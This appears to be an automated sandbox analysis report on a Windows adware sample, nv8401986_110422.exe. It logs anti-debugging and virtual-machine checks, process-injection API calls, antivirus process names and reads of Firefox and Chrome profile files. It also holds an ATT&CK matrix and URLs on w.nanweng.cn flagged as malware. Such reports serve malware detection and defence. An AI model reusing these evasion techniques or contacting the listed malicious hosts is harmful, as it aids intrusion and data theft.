        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BA60000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BAB0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BA80000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BAD0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BAF0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BB10000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BB30000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BB50000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BB70000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BB90000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BBB0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BDD0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BDF0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BE10000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BE30000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BE50000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BE70000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BE90000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BEB0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BED0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C0E0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C100000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C120000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C140000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C3E0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C400000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C560000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C5A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C720000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C740000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C760000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C780000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C800000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C860000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C010000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C050000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BF70000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BF90000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: BFD0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C070000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C090000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C7A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C880000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C8A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C8C0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C8E0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C920000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C940000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C980000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C9A0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: C9E0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CA00000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CA40000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CA60000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CA80000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CAC0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: CAE0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048BD40 sgdt fword ptr [ebp-20h]0_2_0048BD40
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048BB50 sldt word ptr [ebp-1Ch]0_2_0048BB50
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: GetProcAddress,GetAdaptersInfo,0_2_00467280
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: GetSystemDirectoryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetAdaptersInfo,FreeLibrary,0_2_0048FD60
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00468E20 GetProcAddress,GetProcAddress,GetProcAddress,SetupDiGetClassDevsW,GetProcAddress,GetProcAddress,SetupDiGetDeviceRegistryPropertyA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetupDiDestroyDeviceInfoList,0_2_00468E20
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00410800 GetProcAddress,GetProcAddress,GetProcAddress,SHGetPathFromIDListW,FindFirstFileW,CoInitialize,CoCreateInstance,_wcsrchr,_wcschr,CoUninitialize,FindNextFileW,FindClose,0_2_00410800
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048E0D0 CreateFileW,FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,CopyFileW,DeleteFileW,CreateFileW,GetFileSize,ReadFile,CloseHandle,0_2_0048E0D0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00457360 GetProcAddress,FindFirstFileW,CoInitialize,CoCreateInstance,GetProcAddress,GetProcAddress,GetProcAddress,CoUninitialize,FindNextFileW,FindClose,0_2_00457360
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00484290 GetModuleHandleW,GetProcAddress,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_wcsstr,_wcsstr,_wcsstr,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00484290
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
        Source: nv8401986_110422.exe, 00000000.00000003.2035873967.0000000004088000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn*
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.000000000080B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2035873967.0000000004088000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: nv8401986_110422.exe, 00000000.00000003.2017243202.000000000087A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\h
        Source: nv8401986_110422.exe, 00000000.00000002.3302728536.000000000E253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9qemU4p
        Source: C:\Users\user\Desktop\nv8401986_110422.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00466CF0 GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,CheckRemoteDebuggerPresent,GetProcAddress,RtlInitializeCriticalSection,__Init_thread_footer,RtlEnterCriticalSection,RtlLeaveCriticalSection,KiUserExceptionDispatcher,GetSystemTime,GetProcAddress,GetTimeZoneInformation,RasEnumConnectionsW,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetModuleHandleW,GetProcAddress,GetVersionExA,0_2_00466CF0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0051B34E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0051B34E
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0046D180 LoadLibraryA,GetProcAddress,0_2_0046D180
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0052E24E mov eax, dword ptr fs:[00000030h]0_2_0052E24E
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00466CF0 GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,CheckRemoteDebuggerPresent,GetProcAddress,RtlInitializeCriticalSection,__Init_thread_footer,RtlEnterCriticalSection,RtlLeaveCriticalSection,KiUserExceptionDispatcher,GetSystemTime,GetProcAddress,GetTimeZoneInformation,RasEnumConnectionsW,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetModuleHandleW,GetProcAddress,GetVersionExA,0_2_00466CF0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0051B34E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0051B34E
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00513E11 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00513E11
        Source: C:\Users\user\Desktop\nv8401986_110422.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00469FF0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,0_2_00469FF0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048CD60 cpuid 0_2_0048CD60
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0053C938
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: EnumSystemLocalesW,0_2_0053CBFB
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: EnumSystemLocalesW,0_2_0053CBB0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: EnumSystemLocalesW,0_2_00532C21
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: EnumSystemLocalesW,0_2_0053CC96
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: GetLocaleInfoW,0_2_005330EB
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0053D09C
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0053D270
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00468E20 GetProcAddress,GetProcAddress,GetProcAddress,SetupDiGetClassDevsW,GetProcAddress,GetProcAddress,SetupDiGetDeviceRegistryPropertyA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetupDiDestroyDeviceInfoList,0_2_00468E20
        Source: C:\Users\user\Desktop\nv8401986_110422.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004886E0 GetProcAddress,GetProcAddress,GetLocalTime,GetProcAddress,PathFileExistsA,SetFileAttributesA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,CreateFileA,CloseHandle,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,0_2_004886E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00466CF0 GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,CheckRemoteDebuggerPresent,GetProcAddress,RtlInitializeCriticalSection,__Init_thread_footer,RtlEnterCriticalSection,RtlLeaveCriticalSection,KiUserExceptionDispatcher,GetSystemTime,GetProcAddress,GetTimeZoneInformation,RasEnumConnectionsW,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetModuleHandleW,GetProcAddress,GetVersionExA,0_2_00466CF0
        Source: nv8401986_110422.exeBinary or memory string: msmpeng.exe
        Source: nv8401986_110422.exeBinary or memory string: 360tray.exe

        Stealing of Sensitive Information

        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Secure PreferencesJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        1
        OS Credential Dumping
        2
        System Time Discovery
        Remote Services1
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter
        1
        Bootkit
        1
        Process Injection
        1
        Deobfuscate/Decode Files or Information
        1
        Input Capture
        4
        File and Directory Discovery
        Remote Desktop Protocol1
        Data from Local System
        11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
        Obfuscated Files or Information
        Security Account Manager64
        System Information Discovery
        SMB/Windows Admin Shares1
        Input Capture
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Software Packing
        NTDS2
        Query Registry
        Distributed Component Object Model2
        Clipboard Data
        14
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets151
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading
        Cached Domain Credentials15
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items15
        Virtualization/Sandbox Evasion
        DCSync2
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Process Injection
        Proc Filesystem1
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Bootkit
        /etc/passwd and /etc/shadow1
        System Network Configuration Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Source | Detection | Scanner | Label | Link
        nv8401986_110422.exe | 87% | Virustotal | | Browse
        nv8401986_110422.exe | 87% | ReversingLabs | Win32.Adware.Qjwmonkey |
        nv8401986_110422.exe | 100% | Avira | ADWARE/Qjwmonkey.Gen |
        nv8401986_110422.exe | 100% | Joe Sandbox ML | |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif/M | 0% | Avira URL Cloud | safe |
        https://events-sandbox.data.microsoftstart.com/OneCollector/1.0https://browser.events.data.microsoft | 0% | Avira URL Cloud | safe |
        http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gif | 0% | Avira URL Cloud | safe |
        http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif?45295f866ecde2b90fe5d09c7 | 0% | Avira URL Cloud | safe |
        https://assets.msn.comhttps://assets.msn.cn | 0% | Avira URL Cloud | safe |
        http://w.nanweng.cn:80/qy/rq | 100% | Avira URL Cloud | malware |
        http://w.nanweng.cn:80/qy/png | 100% | Avira URL Cloud | malware |
        https://www.msn.comc | 0% | Avira URL Cloud | safe |
        https://browser.events.data.microsoftstart.cn/OneCollector/1.0 | 0% | Avira URL Cloud | safe |
        http://cdn.fengdf.cn/youxi/index_%d_%d.htm | 0% | Avira URL Cloud | safe |
        http://w.nanweng.cn/bqd | 100% | Avira URL Cloud | malware |
        http://cdn.fengdf.cn/youxi/index_%d_%d.htmThumWndClass/qy/o/qy/rq/qy/rq2procgcp=/qy/gcpcpr=/qy/cprda | 0% | Avira URL Cloud | safe |
        https://www.msn.comP | 0% | Avira URL Cloud | safe |
        http://w.nanweng.cn/qy/gl1 | 100% | Avira URL Cloud | malware |
        http://.sq | 0% | Avira URL Cloud | safe |
        http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gifQ | 0% | Avira URL Cloud | safe |
        http://w.nanweng.cn/qy/glf | 100% | Avira URL Cloud | malware |
        http://w.nanweng.cn:80/qy/pngsersd | 100% | Avira URL Cloud | malware |
        http://w.nanweng.cn/qy/gl | 100% | Avira URL Cloud | malware |
        http://w.nanweng.cn/qy/rqh | 100% | Avira URL Cloud | malware |
        http://w.nanweng.cn/qy/png | 100% | Avira URL Cloud | malware |
        https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/ | 0% | Avira URL Cloud | safe |
        https://www.msn. | 0% | Avira URL Cloud | safe |
        https://c.microsoftstart.com/c.gif | 0% | Avira URL Cloud | safe |
        http://w.nanweng.cn:80/qy/lqnrps0sid360softtm1689880905type20uid102e1490f0604c078f675cf9899bc6e6ver6 | 100% | Avira URL Cloud | malware |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        code.jquery.com | 151.101.194.137 | true | false | | high
        w.nanweng.cn | 47.103.45.17 | true | false | | unknown
        sb.scorecardresearch.com | 18.244.18.122 | true | false | | high
        assets.msn.com | unknown | unknown | false | | high
        www.msn.com | unknown | unknown | false | | high
        c.msn.com | unknown | unknown | false | | high
        2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com | unknown | unknown | false | | unknown
        45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com | unknown | unknown | false | | unknown
        login.microsoftonline.com | unknown | unknown | false | | high
        browser.events.data.msn.com | unknown | unknown | false | | high
        238358d141a1b2850f10e9a50017a441.clo.footprintdns.com | unknown | unknown | false | | unknown
        Name | Malicious | Antivirus Detection | Reputation
        https://sb.scorecardresearch.com/b?rn=1735914359603&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=30919B60838E69BC08808E09822668DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null | false | | high
        https://code.jquery.com/jquery-3.6.3.min.js | false | | high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gifnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://browser.events.data.microsoftstart.cn/OneCollector/1.0nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.msn.comcnv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.msn.com/id-id/berita/nasional/tentang-kami/ar-BBca8ZEhttps://www.msn.com/it-it/notizie/mnv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://w.nanweng.cn:80/qy/rqnv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://assets.msn.comhttps://assets.msn.cnnv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.jsnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074343474.000000000B898000.00000004.00000800.00020000.00000000.sdmp, J0K33CCW.htm.0.drfalse
                                      high
                                      https://code.jquery.com/jquery-3.6.3.min.jsctor/1.0?cors=true&content-type=application/x-json-streamnv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://login.microsoftonline.com/error?code=50058#/wxnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.pngnv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://assets.msn.com/nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif?45295f866ecde2b90fe5d09c7nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://aefd.nelreports.net/api/report?cat=bingaotaknv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3302728536.000000000E2C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://deff.nelreports.net/api/report?cat=msnnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://cdn.fengdf.cn/youxi/index_%d_%d.htmnv8401986_110422.exefalse
                                                    • Avira URL Cloud: safe
                                                    unknown
